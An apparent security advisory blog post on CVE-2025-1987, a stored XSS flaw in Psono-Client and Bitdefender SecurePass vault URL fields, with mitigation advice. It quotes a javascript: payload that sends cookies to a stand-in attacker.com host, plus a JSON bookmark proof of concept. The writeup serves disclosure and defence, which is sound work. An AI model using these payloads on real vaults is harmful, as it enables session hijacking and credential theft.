Critical XSS Vulnerability in Psono-Client Exposes Bitdefender SecurePass Users to Arbitrary Code Execution

Overview 

A critical Cross-Site Scripting (XSS) vulnerability (CVE-2025-1987) has been discovered in Psono-Client, affecting its handling of vault entries, particularly those of type website_password and bookmark. This vulnerability impacts Bitdefender SecurePass, which utilizes Psono-Client for password management.

The flaw stems from improper sanitization of the URL field in vault entries, allowing attackers to inject malicious javascript: URLs. When a user interacts with a compromised entry (e.g., clicking or opening it), the embedded JavaScript executes in the context of the Psono vault, leading to arbitrary code execution and potential data theft.

With a CVSS-B score of 9.3 (CRITICAL), this vulnerability poses a severe risk to organizations and individuals relying on Psono-Client for secure password storage. (Published Date: June 21, 2025).

Technical Details 

Root Cause 

Psono-Client fails to properly validate and sanitize URLs stored in vault entries. Attackers can craft malicious entries containing JavaScript payloads instead of legitimate web addresses.

Exploitation Scenario

1. Attack Vector:

   • An attacker creates or modifies a vault entry (e.g., a bookmark or website_password) with a malicious javascript: URL.

   • Example payload:

     javascript:fetch('https://attacker.com/steal?data=' + encodeURIComponent(document.cookie));  

   • The attacker may trick a user into importing a malicious vault or exploit a compromised account.

2. User Interaction: 

   • The victim logs into their Psono vault (or Bitdefender SecurePass).
   • They click on the malicious entry, triggering the JavaScript payload.

3. Impact:

   • The script executes in the Psono vault context, allowing:
     • Session hijacking (stealing cookies/tokens).
     • Exfiltration of stored passwords.
     • Phishing attacks (e.g., displaying fake login prompts).
     • Remote code execution via additional exploits.

Proof of Concept (PoC) 

Malicious Bookmark Entry Example 

An attacker could inject a payload like this into a vault:

{
  "type": "bookmark",
  "name": "Important Link",
  "url": "javascript:alert('XSS');//"
}

When the victim clicks on "Important Link," an alert box appears, demonstrating arbitrary script execution.

Real-World Attack Scenario

1. Phishing Campaign:

   • An attacker sends a malicious vault export file to a victim, disguised as a legitimate backup.
   • The victim imports it, unknowingly adding an XSS payload.

2. Privilege Escalation:

   • If an admin interacts with the malicious entry, the attacker could gain full vault access.

Mitigation & Recommendations

Immediate Actions

• Update Psono-Client to the latest patched version (if available).
• Audit vault entries for suspicious javascript: URLs.
• Disable clickable URLs in vault entries until a fix is deployed.

Long-Term Fixes

• Input Sanitization: Ensure all URLs are validated and stripped of executable code.
• Content Security Policy (CSP): Implement strict CSP headers to block inline scripts.
• User Education: Warn users against importing untrusted vault backups.

Conclusion

CVE-2025-1987 is a severe XSS vulnerability that could allow attackers to compromise password vaults and steal sensitive credentials. Organizations using Psono-Client or Bitdefender SecurePass should apply patches immediately and monitor for suspicious activity.

References

• CVE Details: NVD Entry for CVE-2025-1987
• Psono Security Advisory: Psono GitHub

Stay vigilant and patch promptly to prevent exploitation! 🚨

If you want to read the story about the XSS vulnerability in Psono-Client in CVE-2025-1987:

https://cybercase.cyberhat.online/2025/06/cyberhatonline-story-for-xss-attack.html